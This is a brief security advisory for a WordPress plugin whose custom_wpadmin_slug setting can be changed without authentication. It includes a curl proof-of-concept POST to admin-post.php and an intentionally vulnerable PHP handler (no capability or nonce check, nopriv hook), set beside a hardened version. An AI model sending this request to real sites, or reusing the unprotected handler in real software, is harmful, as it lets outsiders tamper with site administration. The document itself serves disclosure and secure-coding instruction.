The plugin does not have authorisation and CSRF checks in place when updating its custom_wpadmin_slug setting, allowing unauthenticated attackers to change it with a crafted POST request to admin-post.php.
curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php
The setting is displayed under Settings > Permalinks.
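The following is an added illustration, not the plugin's own code: a hypothetical admin-post handler that saves a custom wp-admin slug, first in the unprotected form the advisory describes (no capability check, no nonce check, and hooked on the unauthenticated admin_post_nopriv hook, which is why the PoC needs no login), then in a hardened form with both checks. The hook names, function names and nonce action names are assumptions; the PoC above sends no action parameter, so the example hooks the generic admin_post/admin_post_nopriv actions that admin-post.php fires in that case.

```php
<?php
// Added example, not the plugin's code. Hook names, function names and
// nonce action names are hypothetical.

// --- Unprotected pattern (matches the advisory's description) ---
function hyp_save_slug_unprotected() {
    // Reachable by anyone who POSTs to admin-post.php: no current_user_can(),
    // no nonce verification, and the nopriv hook below means no login needed.
    if ( ! isset( $_POST['custom_wpadmin_slug'] ) ) {
        return;
    }
    $slug = sanitize_title( wp_unslash( $_POST['custom_wpadmin_slug'] ) );
    update_option( 'custom_wpadmin_slug', $slug );
    wp_safe_redirect( admin_url( 'options-permalink.php' ) );
    exit;
}
// admin-post.php fires these generic hooks when no 'action' parameter is sent.
add_action( 'admin_post', 'hyp_save_slug_unprotected' );
add_action( 'admin_post_nopriv', 'hyp_save_slug_unprotected' );

// --- Hardened pattern ---
function hyp_save_slug_hardened() {
    // Authorisation: only users allowed to manage site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF: the request must carry a valid nonce for this specific action;
    // check_admin_referer() dies with a 403 if it is missing or invalid.
    check_admin_referer( 'hyp_save_slug_action', 'hyp_save_slug_nonce' );

    $slug = sanitize_title( wp_unslash( $_POST['custom_wpadmin_slug'] ?? '' ) );
    if ( '' === $slug ) {
        wp_die( 'Invalid slug', '', array( 'response' => 400 ) );
    }
    update_option( 'custom_wpadmin_slug', $slug );
    wp_safe_redirect(
        add_query_arg( 'settings-updated', 'true', admin_url( 'options-permalink.php' ) )
    );
    exit;
}
// Register only the authenticated, action-specific hook; no admin_post_nopriv_*.
add_action( 'admin_post_hyp_save_slug', 'hyp_save_slug_hardened' );

// The matching form on the settings page, carrying the action and the nonce.
function hyp_render_slug_field() {
    $value = get_option( 'custom_wpadmin_slug', '' );
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="hyp_save_slug">';
    wp_nonce_field( 'hyp_save_slug_action', 'hyp_save_slug_nonce' );
    echo '<input type="text" name="custom_wpadmin_slug" value="' . esc_attr( $value ) . '">';
    submit_button( 'Save' );
    echo '</form>';
}
```

With the hardened handler in place, the curl request from the PoC fails twice over: an unauthenticated request never reaches the handler because no admin_post_nopriv hook is registered, and a forged request from a logged-in administrator's browser is rejected by check_admin_referer() because it lacks the per-user, per-action nonce.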